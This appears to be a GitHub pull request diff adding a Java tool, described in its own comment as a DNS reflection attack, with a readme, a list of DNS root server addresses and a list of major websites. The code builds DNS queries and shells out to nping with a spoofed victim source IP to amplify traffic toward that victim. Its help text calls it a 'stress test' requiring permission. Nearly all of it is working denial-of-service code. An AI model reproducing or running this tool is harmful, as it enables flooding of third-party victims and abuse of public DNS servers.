Merge pull request #1 from John-Doggett/John-Doggett-v1

Add files via upload
John-Doggett · Oct 5, 2020 · b2523c5 · b2523c5
2 parents e50efdf + efd89c5
commit b2523c5
Show file tree

Hide file tree

Showing 5 changed files with 211 additions and 0 deletions.
diff --git a/DNSReflectionStressTest/DNSRST/DNSReflector.jar b/DNSReflectionStressTest/DNSRST/DNSReflector.jar
diff --git a/DNSReflectionStressTest/DNSRST/DomainServers b/DNSReflectionStressTest/DNSRST/DomainServers
@@ -0,0 +1,14 @@
+198.41.0.4
+199.9.14.201
+192.33.4.12
+199.7.91.13
+192.203.230
+192.5.5.241
+192.112.36.4
+198.97.190.53
+192.36.148.17
+192.58.128.30
+193.0.14.129
+199.7.83.42
+202.12.27.33
+
diff --git a/DNSReflectionStressTest/DNSRST/Websites b/DNSReflectionStressTest/DNSRST/Websites
@@ -0,0 +1,9 @@
+google.com
+yahoo.com
+youtube.com
+apple.com
+facebook.com
+instagram.com
+discord.com
+github.com
+reddit.com
diff --git a/DNSReflectionStressTest/DNSRST/readme b/DNSReflectionStressTest/DNSRST/readme
@@ -0,0 +1,6 @@
+Make sure to run as root.
+Add a new  website or domain server address to DomainServers and Website file on a new line to add custom websites and domain servers. DomainServers and Websites must be in same directory as DNSReflector.jar.
+Run with java -jar DNSReflector.jar (arguments)
+View help command with java -jar DSNReflector.jar --help
+You can view view more about DNS packets here: http://www.networksorcery.com/enp/protocol/dns.htm
+
diff --git a/DNSReflectionStressTest/src/DNSReflector.java b/DNSReflectionStressTest/src/DNSReflector.java
@@ -0,0 +1,182 @@
+import java.io.File;
+import java.io.IOException;
+import java.io.UnsupportedEncodingException;
+import java.math.BigInteger;
+import java.net.Inet4Address;
+import java.net.InetAddress;
+import java.net.NetworkInterface;
+import java.util.ArrayList;
+import java.util.Enumeration;
+import java.util.Random;
+import java.util.Scanner;
+import java.util.regex.Pattern;
+
+/**
+ * A simple program that uses nping to create a DNS reflection attack. By
+ * spoofing a victim IP packets can be amplified from a DNS server to the
+ * victim.
+ * 
+ * @author John Doggett
+ *
+ */
+public class DNSReflector {
+
+	public static void main(String[] args) throws IOException, InterruptedException {
+		ArrayList<String> domainServers = new ArrayList<String>();
+		ArrayList<String[]> websiteDomains = new ArrayList<String[]>();
+		Scanner domainScan = new Scanner(new File("DomainServers"));
+		Scanner websiteScan = new Scanner(new File("Websites"));
+		while (domainScan.hasNextLine()) {
+			domainServers.add(domainScan.nextLine());
+		}
+		while (websiteScan.hasNextLine()) {
+			websiteDomains.add((websiteScan.nextLine().split(Pattern.quote("."))));
+		}
+		domainScan.close();
+		websiteScan.close();
+
+		String[] hexwebsiteDomains = new String[websiteDomains.size()];
+		for (int a = 0; a < hexwebsiteDomains.length; a++) {
+			hexwebsiteDomains[a] = "";
+		}
+		for (int a = 0; a < websiteDomains.size(); a++) {
+			for (int b = 0; b < websiteDomains.get(a).length; b++) {
+
+				String length = Integer.toHexString(websiteDomains.get(a)[b].length());
+				if (length.length() == 1) {
+					length = "0" + length;
+				}
+
+				hexwebsiteDomains[a] += length + stringToHexString(websiteDomains.get(a)[b]);
+			}
+			hexwebsiteDomains[a] += "00";
+		}
+
+		int numberOfIterations = 1;
+		int count = 1;
+		int rate = 1;
+		String request = "0001";
+
+		String sourceIP = Inet4Address.getLocalHost().getHostAddress();
+
+		if (sourceIP.contains("127")) {
+			Enumeration<NetworkInterface> nInterfaces = NetworkInterface.getNetworkInterfaces();
+			while (nInterfaces.hasMoreElements()) {
+				Enumeration<InetAddress> inetAddresses = nInterfaces.nextElement().getInetAddresses();
+				while (inetAddresses.hasMoreElements()) {
+					String temp = inetAddresses.nextElement().getHostAddress();
+
+					if (temp.contains("127") == false && temp.contains(".")) {
+						sourceIP = temp;
+					}
+				}
+			}
+		}
+
+		if(System.getProperty("user.name").equals("root") == false) {
+			if(args.length >= 1) {
+				args[0] = "--help";
+			}
+			else {
+				args = new String[1];
+				args[0] = "--help";
+			}
+		}
+
+		String sourcePort = "53";
+		boolean verbose = false;
+		for (int a = 0; a < args.length; a++) {
+			switch (args[a]) {
+			case "--count":
+				if (a + 1 < args.length && args[a + 1].matches("^[0-9]*$") && (args[a + 1]).length() >= 1
+						&& Integer.parseInt(args[a + 1]) >= 0) {
+					count = Integer.parseInt(args[a + 1]);
+					a++;
+					break;
+				}
+			case "--rate":
+				if (a + 1 < args.length && args[a + 1].matches("^[0-9]*$") && (args[a + 1]).length() >= 1
+						&& Integer.parseInt(args[a + 1]) >= 0) {
+					rate = Integer.parseInt(args[a + 1]);
+					a++;
+					break;
+				}
+			case "--iterations":
+				if (a + 1 < args.length && args[a + 1].matches("^[0-9]*$") && (args[a + 1]).length() >= 1
+						&& Integer.parseInt(args[a + 1]) >= 0) {
+					numberOfIterations = Integer.parseInt(args[a + 1]);
+					a++;
+					break;
+				}
+			case "--request":
+				if (a + 1 < args.length && args[a + 1].length() == 4) {
+					request = args[a + 1];
+					a++;
+					break;
+				}
+			case "--source-ip":
+				if (a + 1 < args.length) {
+					sourceIP = args[a + 1];
+					a++;
+					break;
+				}
+			case "--source-port":
+				if (a + 1 < args.length) {
+					sourcePort = args[a + 1];
+					a++;
+					break;
+				}
+			case "--verbose":
+				verbose = true;
+				break;
+
+			default:
+				System.out.println("---DNS Reflection Benchmark Stress Test---");
+				System.out.println("Use with permission of target and DNS servers!");
+				System.out.println("-Run as root!-\n");
+				System.out.println(
+						"--count (positive integer), affects how many times each nping thread sends a packet, default 1");
+				System.out.println(
+						"--help (or entering any non-existant commands), will print a help page and prevent sending of packets");
+				System.out.println(
+						"--iterations (positive integer), affects how many nping threads will be made (multiplied by number of websites and number of domain servers), default 1");
+				System.out.println(
+						"--rate (positive integer), amount of packets each nping thread sends per minute, default 1");
+				System.out.println(
+						"--request (2bit hexadecimal string), changes dns packet query type, default 0001 (ipv4 a record)");
+				System.out.println("--source-ip (ipv4 address), spoof udp packet source address, default local ip");
+				System.out.println("--source-port (udp port), will send dns reponse to desired port, default 53");
+				System.out.println(
+						"--verbose, will print arguments for every nping thread created. WARNING: CAUSES HEAVY USAGE IF CREATING LOTS OF THREADS!");
+				numberOfIterations = 0;
+				a = args.length;
+				break;
+
+			}
+
+		}
+
+		Random r = new Random();
+		String IP = "199.7.91.13";
+		for (int c = 0; c < numberOfIterations; c++) {
+			for (int b = 0; b < domainServers.size(); b++) {
+				IP = domainServers.get(b);
+				for (int a = 0; a < hexwebsiteDomains.length; a++) {
+					String command = "nping --ttl 64 --udp --source-ip " + sourceIP + " --dest-port 53 --rate " + rate
+							+ " --send-ip --source-port " + sourcePort + " --count " + count + " --dest-ip " + IP
+							+ " --data " + Integer.toHexString(r.nextInt(65536)) + "00000001000000000000"
+							+ hexwebsiteDomains[a] + request + "0001";
+					if (verbose) {
+						System.out.println(command);
+					}
+					Runtime.getRuntime().exec(command);
+				}
+			}
+		}
+	}
+
+	public static String stringToHexString(String input) throws UnsupportedEncodingException {
+		return String.format("%x", new BigInteger(1, input.getBytes("US-ASCII")));
+	}
+
+}